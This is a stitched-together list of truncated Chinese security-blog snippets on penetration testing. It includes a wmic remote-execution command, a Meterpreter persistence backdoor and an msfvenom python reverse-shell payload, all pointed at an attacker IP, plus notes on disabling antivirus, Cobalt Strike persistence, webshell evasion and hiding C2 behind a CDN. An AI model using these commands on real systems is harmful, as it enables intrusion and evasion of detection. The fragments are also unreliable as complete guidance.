一、远程执行命令方式及对应端口: IPC$+AT 445 PSEXEC 445 WMI 135 Winrm 5985(HTTP)&5986(HTTPS) 二、9种远程执行cmd命令的方法: 1.WMI执行命令方式,无回显: wmic /node:192.168.1.158 /user:pt007 /password:a
攻击机:192.168.85.130 目标机win7:192.168.85.131 Persistence后门 使用此方法建议运行前关闭杀毒软件 Run post/windows/manage/killav 输入run persistence -S -U -X -i 5 -p 6666 -r 192.168.85.130创建一个持久性的后门。 参数解释如下: -A 自动启动一个匹配的漏洞/多
记一次Windows渗透提权历程 故事要从一次屁眼交易讲起,久经沙场的隔壁老王。。。咳咳不好意思念错稿了 最近上手代码审计菜得怀疑人生,因此想回到安逸区利用已知漏洞做下渗透找回自信= = 物色目标 很多站点出于安全考虑,都会在robots.txt文件中屏蔽掉搜索引擎对敏感路径页面的爬取。robots文件里的敏感路径在针对一个目标渗透时可以帮助我们识别出重要页面,但它的存在不利于自动化工具的批量采集
翻译+实践 原文地址: https://www.cobaltstrike.com/agscript-script/index.html 0x03 数据模型 Cobalt Strike的团队服务器存储了所有主机,服务,凭据等信息信息。 数据API 使用&data_query函数即可查询到Cobalt Strike的数据模型。 这个函数可以访问Cobalt Strike客户端维护的所有状态和信息。
翻译+实践 原文地址: https://www.cobaltstrike.com/agscript-script/index.html 0x01 简介 什么是agscript? (agscript为Aggressor Script的简写,直译攻击者脚本通篇读起来怪怪的,故保留。) agscript是CobaltStrike 3.0之后版本中内置的脚本语言,利用Aggresor编写脚本可轻松地武
本文暂不涉及,不考虑免杀,仅为了方便尽可能的保持重启后权限还在。 0x01 前言 Cobalt Strike 一款以Metasploit为基础的GUI框架式渗透测试工具,集成了端口转发、服务扫描,自动化溢出,多模式端口监听,exe、powershell木马生成等。笔者在最近一次钓鱼活动中忘记添加自启直接就重启了目标机器,导致权限丢失,很难受,所以决定自己撸一个一键维权的插件,避免再出现此类低级错
蚁剑更新了利用PHP-FPM实现bypass disable_functions,学习一波 文中提到我(@ttttmr)的是这个,我想的是可以做免杀大小马,看Fastcgi Client放在哪一边了(放大马js里...) 不了解的同学可以先看以下文章 Fastcgi协议分析 && PHP-FPM未授权访问漏洞 && Exp编写 浅析php-fpm的攻击方式 PHP
一 前言 最近在渗透测试中,遇到一个比较有趣的站,因此来分享一下 二 信息收集 首先通过nmap进行端口扫描,同时通过dirsearch进行目录扫描,dirsearch扫描结果如下。 通过目录扫描发现一些有用的信息 第一 axis2构建的webservice 第二 axis2的后台登录地址(/axis2/axis2-admin/)存在 google axis2漏洞,发现多半都是默认口令进入后台
在我们渗透测试的过程中,最常用的就是基于tcp/udp协议反弹一个shell,也就是反向连接。 我们先来讲一下什么是正向连接和反向连接。 正向连接:我们本机去连接目标机器,比如ssh和mstsc 反向连接:目标机器去连接我们本机 那么为什么反向连接会比较常用呢 目标机器处在局域网内,我们正向连不上他 目标机器是动态ip 目标机器存在防火墙 然后说一下我的实验环境 虚拟机采用nat模式 攻击
从零开始学PowerShell渗透测试 前言 win7以后,powershell默认安装在windows上,这是一个非常强大的渗透测试利器 主要用于后渗透的过程中,扩大攻击面,原来没有怎么接触过这玩意,最近发现了几款ps渗透框架才意识到了powershell的强大。所以,还是准备好好学学。从零开始的那种。 基本语法入门 启动 直接通过启动栏输入powershell就好 简单命令 Get-Help
1.前言 最近做渗透测试的过程中经常会用到webshell,在前段时间阅读了dalao的"从静态到动态打造一款免杀的antSword(蚁剑)"一文 https://xz.aliyun.com/t/4000 便着手开始跟着文章进行修改。(p.s 虽然冰蝎的加密十分优秀,不过其不开源、返回包不混淆等特点还是略显无趣) 然而,笔者在修改的过程中发现了一些原作者未考虑到的环节,特此提出与大家探讨。若有偏
前言 在拿下了目标机之后,目标机在内网里面,使用用msf或者CS时,用VPS做服务器的话,会导致自己的VPS的IP泄露,很容易被溯源。 最快最稳的方式当然还是找跳板,当然我这种严格遵守网络安全法的好孩子是不可能有肉鸡做跳板的。 思来想去,查阅了一些资料后发现,域名上线走CDN是个不错的选择。 于是在研究了一段时间之后,写下了这篇文章。 正文 域名和CDN配置 需要的东西:一台国外的VPS 这里我
在最近的一次测试中,随缘摸到了一个sso系统,留给前台的功能只有登陆。 没有验证码,但是登陆点强制要求每个用户更改强密码,而且除了管理员和测试账号其他大部分都是工号形式,所以不考虑撞库。直接fuzz一把梭 测试过程中发现username对于下面payload会存在两种不同回显 当时我并不理解这种payload是什么库的数据格式。但是看到存在"!"字符时,页面的回显是不同的,而"!"在绝大多数语
本文主要介绍两种利用msf生成python版 payload,并利用Py2exe或PyInstaller将python文件转为exe文件,可成功bypass某些AV反弹shell msf-python反弹shell姿势1 1) msfvenom生成python后门 msfvenom -p python/meterpreter/reverse_tcp LHOST=192.168.20.131 LP
Bugbounty: 在Bol.com上的XXE漏洞 原文链接:https://medium.com/@jonathanbouman/xxe-at-bol-com-7d331186de54 这个漏洞的赏金不算太高,但是相比于其他人XXE漏洞,更具有代表性,漏洞猎人上传带有XXE代码的excel进行攻击。 背景 在前面的报告中,我们学到了一些关于访问者在的浏览器中进行代码执行的知识,反射型XSS,